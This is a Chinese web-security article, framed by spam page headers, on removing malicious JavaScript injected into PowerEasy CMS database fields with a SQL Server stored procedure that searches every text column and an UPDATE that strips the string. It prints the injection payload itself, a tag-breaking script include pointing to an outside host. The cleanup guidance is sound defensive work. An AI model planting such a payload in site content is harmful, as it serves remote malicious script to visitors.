国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 網站 > 網站安全 > 正文

解析【木馬】手動刪除動易數據庫被注入JS代碼的方法

2024-09-06 18:38:39
字體:
來源:轉載
供稿:網友

問題:動易數據庫連續幾天被注入JS代碼,那么可不可以直接從數據庫著手進行清除木馬代碼操作呢?

數據庫被注入的代碼是:"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--

 

解決:發現在PE_CLASS表中的tips、Meta_Keywords、Meta_Description、LinkUrl字段存在注入的JS,表太多,一個一個去查,是比較費時費力的,那么我們可以通過一個全庫搜索的方法,建立一個存儲過程

create   proc   p_search  
  @str   Nvarchar(1000)   --要搜索的字符串  
  as  
  if   @str=''   return  
   
  declare   @s   Nvarchar(4000)  
  create   table   #t(表名   sysname,字段名   sysname)  
   
  declare   tb   cursor   local   for  
  select   s='if   exists(select   1   from   ['+replace(b.name,']',']]')+']   where   ['+a.name+']   like   N''%'+@str+'%'')  
  print   ''所在的表及字段:   ['+b.name+'].['+a.name+']'''  
  from   syscolumns   a   join   sysobjects   b   on   a.id=b.id  
  where   b.xtype='U'   and   a.status>=0  
  and   a.xtype   in(175,239,99,35,231,167)  
  open   tb  
  fetch   next   from   tb   into   @s  
  while   @@fetch_status=0  
  begin  
  exec(@s)  
  fetch   next   from   tb   into   @s  
  end  
  close   tb  
  deallocate   tb
GO


執行:p_search '"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'

找到被注入的表及字段,執行恢復操作,下面是一個例子

UPDATE PE_Class SET Tips= Replace(Tips,'"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--','')
 
注意:以上雖然能較方便的處理木馬代碼,但我們仍要對網站文件進行清查工作,不然網站是會反復中木馬的,特別是對于有生成靜態頁面的網站,我們要重新生成下網站頁面,以正常的生成頁面覆蓋現有木馬代碼的頁面
 
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 常德市| 柯坪县| 昌图县| 阜新| 黄梅县| 玉田县| 阿拉善盟| 浮山县| 高雄市| 海淀区| 宜阳县| 建始县| 温州市| 咸阳市| 东兰县| 板桥市| 崇左市| 仙桃市| 常山县| 五华县| 姚安县| 金堂县| 岳普湖县| 若羌县| 洱源县| 永宁县| 桐城市| 达尔| 丰都县| 大连市| 新竹市| 右玉县| 东安县| 纳雍县| 开远市| 海丰县| 噶尔县| 沅江市| 屏东县| 黔西县| 板桥市|